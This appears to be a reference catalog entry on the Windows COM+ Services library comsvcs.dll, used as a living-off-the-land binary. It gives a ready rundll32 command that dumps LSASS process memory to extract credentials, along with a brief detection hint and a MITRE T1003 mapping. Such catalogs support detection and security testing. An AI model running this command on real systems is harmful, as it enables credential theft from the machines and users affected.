.. / Comsvcs.dll
Star

COM+ Services


Paths:


Resources:
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/

Acknowledgement:
modexp - NA


Detection:
MiniDump being used in library



Dump

Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Usecase:Dump Lsass.exe process memory to retrieve credentials.
Privileges required:SYSTEM
OS:Windows
Mitre:T1003